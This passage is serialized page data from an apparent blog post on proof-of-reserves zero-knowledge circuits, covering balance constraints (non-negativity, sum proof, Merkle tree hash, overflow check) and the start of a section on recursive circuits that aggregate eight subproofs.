035},{"className":101034,"style":11373},[11372],[],{"type":27,"tag":207,"props":101037,"children":101039},{"className":101038},[11378],[101040],{"type":33,"value":11381},{"type":27,"tag":207,"props":101042,"children":101044},{"className":101043,"style":11373},[11372],[],{"type":27,"tag":207,"props":101046,"children":101048},{"className":101047},[11283],[101049,101053,101058,101063,101068,101073,101078,101084,101089,101095,101100,101105,101110,101115,101120,101125,101130,101135],{"type":27,"tag":207,"props":101050,"children":101052},{"className":101051,"style":100206},[11288],[],{"type":27,"tag":207,"props":101054,"children":101056},{"className":101055},[11294,28860],[101057],{"type":33,"value":47},{"type":27,"tag":207,"props":101059,"children":101061},{"className":101060},[11294,28860],[101062],{"type":33,"value":100255},{"type":27,"tag":207,"props":101064,"children":101066},{"className":101065},[11294,28860],[101067],{"type":33,"value":29002},{"type":27,"tag":207,"props":101069,"children":101071},{"className":101070,"style":100264},[11294],[101072],{"type":33,"value":10371},{"type":27,"tag":207,"props":101074,"children":101076},{"className":101075},[11294,28860],[101077],{"type":33,"value":36},{"type":27,"tag":207,"props":101079,"children":101081},{"className":101080,"style":100264},[11294,28860],[101082],{"type":33,"value":101083},"r",{"type":27,"tag":207,"props":101085,"children":101087},{"className":101086},[11294,28860],[101088],{"type":33,"value":4690},{"type":27,"tag":207,"props":101090,"children":101092},{"className":101091},[11294,28860],[101093],{"type":33,"value":101094},"ces",{"type":27,"tag":207,"props":101096,"children":101098},{"className":101097},[28989],[101099],{"type":33,"value":11019},{"type":27,"tag":207,"props":101101,"children":101103},{"className":101102},[11294,28860],[101104],{"type":33,"value":47},{"type":27,"tag":207,"props":101106,"children":101108},{"className":101107},[11294,28860],[101109],{"type":33,"value":100255},{"type":27,"tag":207,"props":101111,"children":101113},{"className":101112},[11294,28860],[101114],{"type":33,"value":29002},{"type":27,"tag":207,"props":101116,"children":101118},{"className":101117,"style":100264},[11294],[101119],{"type":33,"value":10371},{"type":27,"tag":207,"props":101121,"children":101123},{"className":101122},[11294,28860],[101124],{"type":33,"value":63637},{"type":27,"tag":207,"props":101126,"children":101128},{"className":101127},[11294,28860],[101129],{"type":33,"value":100523},{"type":27,"tag":207,"props":101131,"children":101133},{"className":101132},[11294,28860],[101134],{"type":33,"value":58372},{"type":27,"tag":207,"props":101136,"children":101138},{"className":101137},[29011],[101139],{"type":33,"value":22686},{"type":27,"tag":1232,"props":101141,"children":101142},{},[101143,101302,101303],{"type":27,"tag":84,"props":101144,"children":101146},{"className":101145},[11266,11267],[101147],{"type":27,"tag":207,"props":101148,"children":101150},{"className":101149},[11272],[101151],{"type":27,"tag":207,"props":101152,"children":101154},{"className":101153,"ariaHidden":11278},[11277],[101155,101288],{"type":27,"tag":207,"props":101156,"children":101158},{"className":101157},[11283],[101159,101163,101168,101173,101178,101183,101188,101193,101198,101203,101208,101213,101218,101275,101279,101284],{"type":27,"tag":207,"props":101160,"children":101162},{"className":101161,"style":100709},[11288],[],{"type":27,"tag":207,"props":101164,"children":101166},{"className":101165},[11294,28860],[101167],{"type":33,"value":47},{"type":27,"tag":207,"props":101169,"children":101171},{"className":101170},[11294,28860],[101172],{"type":33,"value":100721},{"type":27,"tag":207,"props":101174,"children":101176},{"className":101175},[11294,28860],[101177],{"type":33,"value":100523},{"type":27,"tag":207,"props":101179,"children":101181},{"className":101180},[11294,28860],[101182],{"type":33,"value":63637},{"type":27,"tag":207,"props":101184,"children":101186},{"className":101185},[11294,28860],[101187],{"type":33,"value":29002},{"type":27,"tag":207,"props":101189,"children":101191},{"className":101190,"style":100264},[11294],[101192],{"type":33,"value":10371},{"type":27,"tag":207,"props":101194,"children":101196},{"className":101195},[11294,28860],[101197],{"type":33,"value":1419},{"type":27,"tag":207,"props":101199,"children":101201},{"className":101200,"style":100750},[11294,28860],[101202],{"type":33,"value":100753},{"type":27,"tag":207,"props":101204,"children":101206},{"className":101205},[11294,28860],[101207],{"type":33,"value":100523},{"type":27,"tag":207,"props":101209,"children":101211},{"className":101210},[11294,28860],[101212],{"type":33,"value":4690},{"type":27,"tag":207,"props":101214,"children":101216},{"className":101215},[11294,28860],[101217],{"type":33,"value":29002},{"type":27,"tag":207,"props":101219,"children":101221},{"className":101220},[11294],[101222,101227],{"type":27,"tag":207,"props":101223,"children":101225},{"className":101224,"style":100750},[11294,28860],[101226],{"type":33,"value":10403},{"type":27,"tag":207,"props":101228,"children":101230},{"className":101229},[11309],[101231],{"type":27,"tag":207,"props":101232,"children":101234},{"className":101233},[11314,28914],[101235,101264],{"type":27,"tag":207,"props":101236,"children":101238},{"className":101237},[11319],[101239,101259],{"type":27,"tag":207,"props":101240,"children":101242},{"className":101241,"style":100793},[11324],[101243],{"type":27,"tag":207,"props":101244,"children":101245},{"style":100797},[101246,101250],{"type":27,"tag":207,"props":101247,"children":101249},{"className":101248,"style":11334},[11333],[],{"type":27,"tag":207,"props":101251,"children":101253},{"className":101252},[11339,11340,11341,11342],[101254],{"type":27,"tag":207,"props":101255,"children":101257},{"className":101256},[11294,28860,11342],[101258],{"type":33,"value":4690},{"type":27,"tag":207,"props":101260,"children":101262},{"className":101261},[29017],[101263],{"type":33,"value":29020},{"type":27,"tag":207,"props":101265,"children":101267},{"className":101266},[11319],[101268],{"type":27,"tag":207,"props":101269,"children":101271},{"className":101270,"style":100347},[11324],[101272],{"type":27,"tag":207,"props":101273,"children":101274},{},[],{"type":27,"tag":207,"props":101276,"children":101278},{"className":101277,"style":11470},[11372],[],{"type":27,"tag":207,"props":101280,"children":101282},{"className":101281},[11475],[101283],{"type":33,"value":17220},{"type":27,"tag":207,"props":101285,"children":101287},{"className":101286,"style":11470},[11372],[],{"type":27,"tag":207,"props":101289,"children":101291},{"className":101290},[11283],[101292,101297],{"type":27,"tag":207,"props":101293,"children":101296},{"className":101294,"style":101295},[11288],"height:0.6444em;",[],{"type":27,"tag":207,"props":101298,"children":101300},{"className":101299},[11294],[101301],{"type":33,"value":1660},{"type":33,"value":13740},{"type":27,"tag":12606,"props":101304,"children":101305},{},[101306],{"type":33,"value":101307},"(non-negativity)",{"type":27,"tag":1232,"props":101309,"children":101310},{},[101311,101649,101650],{"type":27,"tag":84,"props":101312,"children":101314},{"className":101313},[11266,11267],[101315],{"type":27,"tag":207,"props":101316,"children":101318},{"className":101317},[11272],[101319],{"type":27,"tag":207,"props":101320,"children":101322},{"className":101321,"ariaHidden":11278},[11277],[101323,101459],{"type":27,"tag":207,"props":101324,"children":101326},{"className":101325},[11283],[101327,101331,101336,101341,101346,101351,101356,101361,101366,101371,101376,101381,101386,101391,101396,101401,101406,101411,101416,101421,101426,101431,101436,101441,101446,101450,101455],{"type":27,"tag":207,"props":101328,"children":101330},{"className":101329,"style":100206},[11288],[],{"type":27,"tag":207,"props":101332,"children":101334},{"className":101333},[11294,28860],[101335],{"type":33,"value":29002},{"type":27,"tag":207,"props":101337,"children":101339},{"className":101338},[11294,28860],[101340],{"type":33,"value":100234},{"type":27,"tag":207,"props":101342,"children":101344},{"className":101343},[11294,28860],[101345],{"type":33,"value":29002},{"type":27,"tag":207,"props":101347,"children":101349},{"className":101348},[11294,28860],[101350],{"type":33,"value":47},{"type":27,"tag":207,"props":101352,"children":101354},{"className":101353,"style":100276},[11294,28860],[101355],{"type":33,"value":100279},{"type":27,"tag":207,"props":101357,"children":101359},{"className":101358,"style":100264},[11294],[101360],{"type":33,"value":10371},{"type":27,"tag":207,"props":101362,"children":101364},{"className":101363},[11294,28860],[101365],{"type":33,"value":47},{"type":27,"tag":207,"props":101367,"children":101369},{"className":101368},[11294,28860],[101370],{"type":33,"value":100255},{"type":27,"tag":207,"props":101372,"children":101374},{"className":101373},[11294,28860],[101375],{"type":33,"value":29002},{"type":27,"tag":207,"props":101377,"children":101379},{"className":101378,"style":100264},[11294],[101380],{"type":33,"value":10371},{"type":27,"tag":207,"props":101382,"children":101384},{"className":101383},[11294,28860],[101385],{"type":33,"value":100272},{"type":27,"tag":207,"props":101387,"children":101389},{"className":101388,"style":100276},[11294,28860],[101390],{"type":33,"value":100279},{"type":27,"tag":207,"props":101392,"children":101394},{"className":101393},[11294,28860],[101395],{"type":33,"value":100285},{"type":27,"tag":207,"props":101397,"children":101399},{"className":101398},[11294,28860],[101400],{"type":33,"value":100291},{"type":27,"tag":207,"props":101402,"children":101404},{"className":101403},[28989],[101405],{"type":33,"value":11019},{"type":27,"tag":207,"props":101407,"children":101409},{"className":101408},[11294,28860],[101410],{"type":33,"value":47},{"type":27,"tag":207,"props":101412,"children":101414},{"className":101413},[11294,28860],[101415],{"type":33,"value":100255},{"type":27,"tag":207,"props":101417,"children":101419},{"className":101418},[11294,28860],[101420],{"type":33,"value":29002},{"type":27,"tag":207,"props":101422,"children":101424},{"className":101423,"style":100264},[11294],[101425],{"type":33,"value":10371},{"type":27,"tag":207,"props":101427,"children":101429},{"className":101428},[11294,28860],[101430],{"type":33,"value":63637},{"type":27,"tag":207,"props":101432,"children":101434},{"className":101433},[11294,28860],[101435],{"type":33,"value":100523},{"type":27,"tag":207,"props":101437,"children":101439},{"className":101438},[11294,28860],[101440],{"type":33,"value":58372},{"type":27,"tag":207,"props":101442,"children":101444},{"className":101443},[29011],[101445],{"type":33,"value":22686},{"type":27,"tag":207,"props":101447,"children":101449},{"className":101448,"style":11470},[11372],[],{"type":27,"tag":207,"props":101451,"children":101453},{"className":101452},[11475],[101454],{"type":33,"value":15856},{"type":27,"tag":207,"props":101456,"children":101458},{"className":101457,"style":11470},[11372],[],{"type":27,"tag":207,"props":101460,"children":101462},{"className":101461},[11283],[101463,101467,101472,101477,101482,101487,101492,101497,101502,101507,101512,101517,101522,101527,101532,101537,101542,101547,101604,101609,101614,101619,101624,101629,101634,101639,101644],{"type":27,"tag":207,"props":101464,"children":101466},{"className":101465,"style":100206},[11288],[],{"type":27,"tag":207,"props":101468,"children":101470},{"className":101469},[11294],[101471],{"type":33,"value":100854},{"type":27,"tag":207,"props":101473,"children":101475},{"className":101474},[11372],[101476],{"type":33,"value":28961},{"type":27,"tag":207,"props":101478,"children":101480},{"className":101479},[11294,28860],[101481],{"type":33,"value":47},{"type":27,"tag":207,"props":101483,"children":101485},{"className":101484},[11294,28860],[101486],{"type":33,"value":100721},{"type":27,"tag":207,"props":101488,"children":101490},{"className":101489},[11294,28860],[101491],{"type":33,"value":100523},{"type":27,"tag":207,"props":101493,"children":101495},{"className":101494},[11294,28860],[101496],{"type":33,"value":63637},{"type":27,"tag":207,"props":101498,"children":101500},{"className":101499},[11294,28860],[101501],{"type":33,"value":29002},{"type":27,"tag":207,"props":101503,"children":101505},{"className":101504,"style":100264},[11294],[101506],{"type":33,"value":10371},{"type":27,"tag":207,"props":101508,"children":101510},{"className":101509},[11294,28860],[101511],{"type":33,"value":47},{"type":27,"tag":207,"props":101513,"children":101515},{"className":101514},[11294,28860],[101516],{"type":33,"value":100255},{"type":27,"tag":207,"props":101518,"children":101520},{"className":101519},[11294,28860],[101521],{"type":33,"value":29002},{"type":27,"tag":207,"props":101523,"children":101525},{"className":101524,"style":100264},[11294],[101526],{"type":33,"value":10371},{"type":27,"tag":207,"props":101528,"children":101530},{"className":101529},[11294,28860],[101531],{"type":33,"value":100272},{"type":27,"tag":207,"props":101533,"children":101535},{"className":101534,"style":100276},[11294,28860],[101536],{"type":33,"value":100279},{"type":27,"tag":207,"props":101538,"children":101540},{"className":101539},[11294,28860],[101541],{"type":33,"value":100285},{"type":27,"tag":207,"props":101543,"children":101545},{"className":101544},[11294,28860],[101546],{"type":33,"value":100291},{"type":27,"tag":207,"props":101548,"children":101550},{"className":101549},[11294],[101551,101556],{"type":27,"tag":207,"props":101552,"children":101554},{"className":101553},[11294,28860],[101555],{"type":33,"value":17929},{"type":27,"tag":207,"props":101557,"children":101559},{"className":101558},[11309],[101560],{"type":27,"tag":207,"props":101561,"children":101563},{"className":101562},[11314,28914],[101564,101593],{"type":27,"tag":207,"props":101565,"children":101567},{"className":101566},[11319],[101568,101588],{"type":27,"tag":207,"props":101569,"children":101571},{"className":101570,"style":100793},[11324],[101572],{"type":27,"tag":207,"props":101573,"children":101574},{"style":100320},[101575,101579],{"type":27,"tag":207,"props":101576,"children":101578},{"className":101577,"style":11334},[11333],[],{"type":27,"tag":207,"props":101580,"children":101582},{"className":101581},[11339,11340,11341,11342],[101583],{"type":27,"tag":207,"props":101584,"children":101586},{"className":101585},[11294,28860,11342],[101587],{"type":33,"value":4690},{"type":27,"tag":207,"props":101589,"children":101591},{"className":101590},[29017],[101592],{"type":33,"value":29020},{"type":27,"tag":207,"props":101594,"children":101596},{"className":101595},[11319],[101597],{"type":27,"tag":207,"props":101598,"children":101600},{"className":101599,"style":100347},[11324],[101601],{"type":27,"tag":207,"props":101602,"children":101603},{},[],{"type":27,"tag":207,"props":101605,"children":101607},{"className":101606},[28989],[101608],{"type":33,"value":11019},{"type":27,"tag":207,"props":101610,"children":101612},{"className":101611},[11294,28860],[101613],{"type":33,"value":47},{"type":27,"tag":207,"props":101615,"children":101617},{"className":101616},[11294,28860],[101618],{"type":33,"value":100255},{"type":27,"tag":207,"props":101620,"children":101622},{"className":101621},[11294,28860],[101623],{"type":33,"value":29002},{"type":27,"tag":207,"props":101625,"children":101627},{"className":101626,"style":100264},[11294],[101628],{"type":33,"value":10371},{"type":27,"tag":207,"props":101630,"children":101632},{"className":101631},[11294,28860],[101633],{"type":33,"value":63637},{"type":27,"tag":207,"props":101635,"children":101637},{"className":101636},[11294,28860],[101638],{"type":33,"value":100523},{"type":27,"tag":207,"props":101640,"children":101642},{"className":101641},[11294,28860],[101643],{"type":33,"value":58372},{"type":27,"tag":207,"props":101645,"children":101647},{"className":101646},[29011],[101648],{"type":33,"value":22686},{"type":33,"value":13740},{"type":27,"tag":12606,"props":101651,"children":101652},{},[101653],{"type":33,"value":101654},"(sum proof)",{"type":27,"tag":1232,"props":101656,"children":101657},{},[101658,102047,102048],{"type":27,"tag":84,"props":101659,"children":101661},{"className":101660},[11266,11267],[101662],{"type":27,"tag":207,"props":101663,"children":101665},{"className":101664},[11272],[101666],{"type":27,"tag":207,"props":101667,"children":101669},{"className":101668,"ariaHidden":11278},[11277],[101670,101756],{"type":27,"tag":207,"props":101671,"children":101673},{"className":101672},[11283],[101674,101679,101684,101690,101696,101701,101706,101711,101716,101722,101727,101733,101738,101743,101747,101752],{"type":27,"tag":207,"props":101675,"children":101678},{"className":101676,"style":101677},[11288],"height:1.0044em;vertical-align:-0.31em;",[],{"type":27,"tag":207,"props":101680,"children":101682},{"className":101681},[11294,28860],[101683],{"type":33,"value":58372},{"type":27,"tag":207,"props":101685,"children":101687},{"className":101686,"style":100264},[11294,28860],[101688],{"type":33,"value":101689},"er",{"type":27,"tag":207,"props":101691,"children":101694},{"className":101692,"style":101693},[11294,28860],"margin-right:0.03148em;",[101695],{"type":33,"value":95904},{"type":27,"tag":207,"props":101697,"children":101699},{"className":101698,"style":100276},[11294,28860],[101700],{"type":33,"value":100279},{"type":27,"tag":207,"props":101702,"children":101704},{"className":101703},[11294,28860],[101705],{"type":33,"value":1419},{"type":27,"tag":207,"props":101707,"children":101709},{"className":101708,"style":100264},[11294],[101710],{"type":33,"value":10371},{"type":27,"tag":207,"props":101712,"children":101714},{"className":101713},[11294,28860],[101715],{"type":33,"value":29002},{"type":27,"tag":207,"props":101717,"children":101719},{"className":101718},[11294,28860],[101720],{"type":33,"value":101721},"ree",{"type":27,"tag":207,"props":101723,"children":101725},{"className":101724,"style":100264},[11294],[101726],{"type":33,"value":10371},{"type":27,"tag":207,"props":101728,"children":101730},{"className":101729},[11294,28860],[101731],{"type":33,"value":101732},"ha",{"type":27,"tag":207,"props":101734,"children":101736},{"className":101735},[11294,28860],[101737],{"type":33,"value":17929},{"type":27,"tag":207,"props":101739,"children":101741},{"className":101740},[11294,28860],[101742],{"type":33,"value":91568},{"type":27,"tag":207,"props":101744,"children":101746},{"className":101745,"style":11470},[11372],[],{"type":27,"tag":207,"props":101748,"children":101750},{"className":101749},[11475],[101751],{"type":33,"value":15856},{"type":27,"tag":207,"props":101753,"children":101755},{"className":101754,"style":11470},[11372],[],{"type":27,"tag":207,"props":101757,"children":101759},{"className":101758},[11283],[101760,101764,101769,101774,101779,101784,101789,101794,101799,101804,101809,101866,101871,101875,101880,101885,101942,101947,101952,101956,101961,101966,101970,101975,101980,102042],{"type":27,"tag":207,"props":101761,"children":101763},{"className":101762,"style":11393},[11288],[],{"type":27,"tag":207,"props":101765,"children":101767},{"className":101766,"style":28861},[11294,28860],[101768],{"type":33,"value":28864},{"type":27,"tag":207,"props":101770,"children":101772},{"className":101771},[11294,28860],[101773],{"type":33,"value":100218},{"type":27,"tag":207,"props":101775,"children":101777},{"className":101776},[11294,28860],[101778],{"type":33,"value":4690},{"type":27,"tag":207,"props":101780,"children":101782},{"className":101781},[11294,28860],[101783],{"type":33,"value":77797},{"type":27,"tag":207,"props":101785,"children":101787},{"className":101786},[11294,28860],[101788],{"type":33,"value":100234},{"type":27,"tag":207,"props":101790,"children":101792},{"className":101791},[11294,28860],[101793],{"type":33,"value":63637},{"type":27,"tag":207,"props":101795,"children":101797},{"className":101796},[28989],[101798],{"type":33,"value":1343},{"type":27,"tag":207,"props":101800,"children":101802},{"className":101801},[11294,28860],[101803],{"type":33,"value":101732},{"type":27,"tag":207,"props":101805,"children":101807},{"className":101806},[11294,28860],[101808],{"type":33,"value":17929},{"type":27,"tag":207,"props":101810,"children":101812},{"className":101811},[11294],[101813,101818],{"type":27,"tag":207,"props":101814,"children":101816},{"className":101815},[11294,28860],[101817],{"type":33,"value":91568},{"type":27,"tag":207,"props":101819,"children":101821},{"className":101820},[11309],[101822],{"type":27,"tag":207,"props":101823,"children":101825},{"className":101824},[11314,28914],[101826,101855],{"type":27,"tag":207,"props":101827,"children":101829},{"className":101828},[11319],[101830,101850],{"type":27,"tag":207,"props":101831,"children":101833},{"className":101832,"style":100316},[11324],[101834],{"type":27,"tag":207,"props":101835,"children":101836},{"style":100320},[101837,101841],{"type":27,"tag":207,"props":101838,"children":101840},{"className":101839,"style":11334},[11333],[],{"type":27,"tag":207,"props":101842,"children":101844},{"className":101843},[11339,11340,11341,11342],[101845],{"type":27,"tag":207,"props":101846,"children":101848},{"className":101847},[11294,11342],[101849],{"type":33,"value":1660},{"type":27,"tag":207,"props":101851,"children":101853},{"className":101852},[29017],[101854],{"type":33,"value":29020},{"type":27,"tag":207,"props":101856,"children":101858},{"className":101857},[11319],[101859],{"type":27,"tag":207,"props":101860,"children":101862},{"className":101861,"style":100347},[11324],[101863],{"type":27,"tag":207,"props":101864,"children":101865},{},[],{"type":27,"tag":207,"props":101867,"children":101869},{"className":101868},[11404],[101870],{"type":33,"value":11407},{"type":27,"tag":207,"props":101872,"children":101874},{"className":101873,"style":11411},[11372],[],{"type":27,"tag":207,"props":101876,"children":101878},{"className":101877},[11294,28860],[101879],{"type":33,"value":101732},{"type":27,"tag":207,"props":101881,"children":101883},{"className":101882},[11294,28860],[101884],{"type":33,"value":17929},{"type":27,"tag":207,"props":101886,"children":101888},{"className":101887},[11294],[101889,101894],{"type":27,"tag":207,"props":101890,"children":101892},{"className":101891},[11294,28860],[101893],{"type":33,"value":91568},{"type":27,"tag":207,"props":101895,"children":101897},{"className":101896},[11309],[101898],{"type":27,"tag":207,"props":101899,"children":101901},{"className":101900},[11314,28914],[101902,101931],{"type":27,"tag":207,"props":101903,"children":101905},{"className":101904},[11319],[101906,101926],{"type":27,"tag":207,"props":101907,"children":101909},{"className":101908,"style":100316},[11324],[101910],{"type":27,"tag":207,"props":101911,"children":101912},{"style":100320},[101913,101917],{"type":27,"tag":207,"props":101914,"children":101916},{"className":101915,"style":11334},[11333],[],{"type":27,"tag":207,"props":101918,"children":101920},{"className":101919},[11339,11340,11341,11342],[101921],{"type":27,"tag":207,"props":101922,"children":101924},{"className":101923},[11294,11342],[101925],{"type":33,"value":1651},{"type":27,"tag":207,"props":101927,"children":101929},{"className":101928},[29017],[101930],{"type":33,"value":29020},{"type":27,"tag":207,"props":101932,"children":101934},{"className":101933},[11319],[101935],{"type":27,"tag":207,"props":101936,"children":101938},{"className":101937,"style":100347},[11324],[101939],{"type":27,"tag":207,"props":101940,"children":101941},{},[],{"type":27,"tag":207,"props":101943,"children":101945},{"className":101944},[11404],[101946],{"type":33,"value":11407},{"type":27,"tag":207,"props":101948,"children":101950},{"className":101949},[11372],[101951],{"type":33,"value":28961},{"type":27,"tag":207,"props":101953,"children":101955},{"className":101954,"style":11411},[11372],[],{"type":27,"tag":207,"props":101957,"children":101959},{"className":101958},[11294],[101960],{"type":33,"value":16867},{"type":27,"tag":207,"props":101962,"children":101964},{"className":101963},[11404],[101965],{"type":33,"value":11407},{"type":27,"tag":207,"props":101967,"children":101969},{"className":101968,"style":11411},[11372],[],{"type":27,"tag":207,"props":101971,"children":101973},{"className":101972},[11294,28860],[101974],{"type":33,"value":101732},{"type":27,"tag":207,"props":101976,"children":101978},{"className":101977},[11294,28860],[101979],{"type":33,"value":17929},{"type":27,"tag":207,"props":101981,"children":101983},{"className":101982},[11294],[101984,101989],{"type":27,"tag":207,"props":101985,"children":101987},{"className":101986},[11294,28860],[101988],{"type":33,"value":91568},{"type":27,"tag":207,"props":101990,"children":101992},{"className":101991},[11309],[101993],{"type":27,"tag":207,"props":101994,"children":101996},{"className":101995},[11314,28914],[101997,102031],{"type":27,"tag":207,"props":101998,"children":102000},{"className":101999},[11319],[102001,102026],{"type":27,"tag":207,"props":102002,"children":102004},{"className":102003,"style":100316},[11324],[102005],{"type":27,"tag":207,"props":102006,"children":102007},{"style":100320},[102008,102012],{"type":27,"tag":207,"props":102009,"children":102011},{"className":102010,"style":11334},[11333],[],{"type":27,"tag":207,"props":102013,"children":102015},{"className":102014},[11339,11340,11341,11342],[102016],{"type":27,"tag":207,"props":102017,"children":102019},{"className":102018},[11294,11342],[102020],{"type":27,"tag":207,"props":102021,"children":102023},{"className":102022},[11294,11342],[102024],{"type":33,"value":102025},"511",{"type":27,"tag":207,"props":102027,"children":102029},{"className":102028},[29017],[102030],{"type":33,"value":29020},{"type":27,"tag":207,"props":102032,"children":102034},{"className":102033},[11319],[102035],{"type":27,"tag":207,"props":102036,"children":102038},{"className":102037,"style":100347},[11324],[102039],{"type":27,"tag":207,"props":102040,"children":102041},{},[],{"type":27,"tag":207,"props":102043,"children":102045},{"className":102044},[29011],[102046],{"type":33,"value":10416},{"type":33,"value":13740},{"type":27,"tag":12606,"props":102049,"children":102050},{},[102051],{"type":33,"value":102052},"(merkle tree hash)",{"type":27,"tag":1232,"props":102054,"children":102055},{},[102056,102331,102332,102337,102339,102344],{"type":27,"tag":84,"props":102057,"children":102059},{"className":102058},[11266,11267],[102060],{"type":27,"tag":207,"props":102061,"children":102063},{"className":102062},[11272],[102064],{"type":27,"tag":207,"props":102065,"children":102067},{"className":102066,"ariaHidden":11278},[11277],[102068,102261],{"type":27,"tag":207,"props":102069,"children":102071},{"className":102070},[11283],[102072,102076,102081,102086,102091,102096,102101,102106,102111,102116,102121,102126,102131,102136,102141,102146,102203,102208,102213,102218,102223,102228,102233,102238,102243,102248,102252,102257],{"type":27,"tag":207,"props":102073,"children":102075},{"className":102074,"style":100206},[11288],[],{"type":27,"tag":207,"props":102077,"children":102079},{"className":102078},[11294,28860],[102080],{"type":33,"value":47},{"type":27,"tag":207,"props":102082,"children":102084},{"className":102083},[11294,28860],[102085],{"type":33,"value":100721},{"type":27,"tag":207,"props":102087,"children":102089},{"className":102088},[11294,28860],[102090],{"type":33,"value":100523},{"type":27,"tag":207,"props":102092,"children":102094},{"className":102093},[11294,28860],[102095],{"type":33,"value":63637},{"type":27,"tag":207,"props":102097,"children":102099},{"className":102098},[11294,28860],[102100],{"type":33,"value":29002},{"type":27,"tag":207,"props":102102,"children":102104},{"className":102103,"style":100264},[11294],[102105],{"type":33,"value":10371},{"type":27,"tag":207,"props":102107,"children":102109},{"className":102108},[11294,28860],[102110],{"type":33,"value":47},{"type":27,"tag":207,"props":102112,"children":102114},{"className":102113},[11294,28860],[102115],{"type":33,"value":100255},{"type":27,"tag":207,"props":102117,"children":102119},{"className":102118},[11294,28860],[102120],{"type":33,"value":29002},{"type":27,"tag":207,"props":102122,"children":102124},{"className":102123,"style":100264},[11294],[102125],{"type":33,"value":10371},{"type":27,"tag":207,"props":102127,"children":102129},{"className":102128},[11294,28860],[102130],{"type":33,"value":100272},{"type":27,"tag":207,"props":102132,"children":102134},{"className":102133,"style":100276},[11294,28860],[102135],{"type":33,"value":100279},{"type":27,"tag":207,"props":102137,"children":102139},{"className":102138},[11294,28860],[102140],{"type":33,"value":100285},{"type":27,"tag":207,"props":102142,"children":102144},{"className":102143},[11294,28860],[102145],{"type":33,"value":100291},{"type":27,"tag":207,"props":102147,"children":102149},{"className":102148},[11294],[102150,102155],{"type":27,"tag":207,"props":102151,"children":102153},{"className":102152},[11294,28860],[102154],{"type":33,"value":17929},{"type":27,"tag":207,"props":102156,"children":102158},{"className":102157},[11309],[102159],{"type":27,"tag":207,"props":102160,"children":102162},{"className":102161},[11314,28914],[102163,102192],{"type":27,"tag":207,"props":102164,"children":102166},{"className":102165},[11319],[102167,102187],{"type":27,"tag":207,"props":102168,"children":102170},{"className":102169,"style":100793},[11324],[102171],{"type":27,"tag":207,"props":102172,"children":102173},{"style":100320},[102174,102178],{"type":27,"tag":207,"props":102175,"children":102177},{"className":102176,"style":11334},[11333],[],{"type":27,"tag":207,"props":102179,"children":102181},{"className":102180},[11339,11340,11341,11342],[102182],{"type":27,"tag":207,"props":102183,"children":102185},{"className":102184},[11294,28860,11342],[102186],{"type":33,"value":4690},{"type":27,"tag":207,"props":102188,"children":102190},{"className":102189},[29017],[102191],{"type":33,"value":29020},{"type":27,"tag":207,"props":102193,"children":102195},{"className":102194},[11319],[102196],{"type":27,"tag":207,"props":102197,"children":102199},{"className":102198,"style":100347},[11324],[102200],{"type":27,"tag":207,"props":102201,"children":102202},{},[],{"type":27,"tag":207,"props":102204,"children":102206},{"className":102205},[28989],[102207],{"type":33,"value":11019},{"type":27,"tag":207,"props":102209,"children":102211},{"className":102210},[11294,28860],[102212],{"type":33,"value":47},{"type":27,"tag":207,"props":102214,"children":102216},{"className":102215},[11294,28860],[102217],{"type":33,"value":100255},{"type":27,"tag":207,"props":102219,"children":102221},{"className":102220},[11294,28860],[102222],{"type":33,"value":29002},{"type":27,"tag":207,"props":102224,"children":102226},{"className":102225,"style":100264},[11294],[102227],{"type":33,"value":10371},{"type":27,"tag":207,"props":102229,"children":102231},{"className":102230},[11294,28860],[102232],{"type":33,"value":63637},{"type":27,"tag":207,"props":102234,"children":102236},{"className":102235},[11294,28860],[102237],{"type":33,"value":100523},{"type":27,"tag":207,"props":102239,"children":102241},{"className":102240},[11294,28860],[102242],{"type":33,"value":58372},{"type":27,"tag":207,"props":102244,"children":102246},{"className":102245},[29011],[102247],{"type":33,"value":22686},{"type":27,"tag":207,"props":102249,"children":102251},{"className":102250,"style":11470},[11372],[],{"type":27,"tag":207,"props":102253,"children":102255},{"className":102254},[11475],[102256],{"type":33,"value":9257},{"type":27,"tag":207,"props":102258,"children":102260},{"className":102259,"style":11470},[11372],[],{"type":27,"tag":207,"props":102262,"children":102264},{"className":102263},[11283],[102265,102269,102276,102281,102287,102292,102297,102302,102308,102313,102319,102325],{"type":27,"tag":207,"props":102266,"children":102268},{"className":102267,"style":100206},[11288],[],{"type":27,"tag":207,"props":102270,"children":102273},{"className":102271,"style":102272},[11294,28860],"margin-right:0.10903em;",[102274],{"type":33,"value":102275},"M",{"type":27,"tag":207,"props":102277,"children":102279},{"className":102278},[11294,28860],[102280],{"type":33,"value":83998},{"type":27,"tag":207,"props":102282,"children":102285},{"className":102283,"style":102284},[11294,28860],"margin-right:0.07847em;",[102286],{"type":33,"value":13415},{"type":27,"tag":207,"props":102288,"children":102290},{"className":102289,"style":100264},[11294],[102291],{"type":33,"value":10371},{"type":27,"tag":207,"props":102293,"children":102295},{"className":102294,"style":29319},[11294,28860],[102296],{"type":33,"value":29322},{"type":27,"tag":207,"props":102298,"children":102300},{"className":102299},[11294,28860],[102301],{"type":33,"value":83998},{"type":27,"tag":207,"props":102303,"children":102305},{"className":102304,"style":29319},[11294,28860],[102306],{"type":33,"value":102307},"FE",{"type":27,"tag":207,"props":102309,"children":102311},{"className":102310,"style":100264},[11294],[102312],{"type":33,"value":10371},{"type":27,"tag":207,"props":102314,"children":102316},{"className":102315,"style":102284},[11294,28860],[102317],{"type":33,"value":102318},"I",{"type":27,"tag":207,"props":102320,"children":102322},{"className":102321,"style":28861},[11294,28860],[102323],{"type":33,"value":102324},"NT",{"type":27,"tag":207,"props":102326,"children":102328},{"className":102327},[11294],[102329],{"type":33,"value":102330},"/512",{"type":33,"value":13740},{"type":27,"tag":12606,"props":102333,"children":102334},{},[102335],{"type":33,"value":102336},"(overflow check)",{"type":33,"value":102338}," --> overflow check is made this way for performance (note that 512 is actually the ",{"type":27,"tag":84,"props":102340,"children":102342},{"className":102341},[],[102343],{"type":33,"value":100122},{"type":33,"value":10416},{"type":27,"tag":36,"props":102346,"children":102347},{},[102348],{"type":33,"value":102349},"Here is a visual scheme of the inputs of the batch circuit + how user hashes are generated:",{"type":27,"tag":36,"props":102351,"children":102352},{},[102353],{"type":27,"tag":126,"props":102354,"children":102356},{"alt":57817,"src":102355},"/posts/por/batch-circuit-inputs.png",[],{"type":27,"tag":58,"props":102358,"children":102360},{"id":102359},"recursive-circuit",[102361],{"type":33,"value":102362},"Recursive Circuit",{"type":27,"tag":36,"props":102364,"children":102365},{},[102366],{"type":33,"value":102367},"Recursive circuits get eight subproofs as input, verify if all the asset prices are the same, and calculate the summed balances and Merkle hash. Here are the 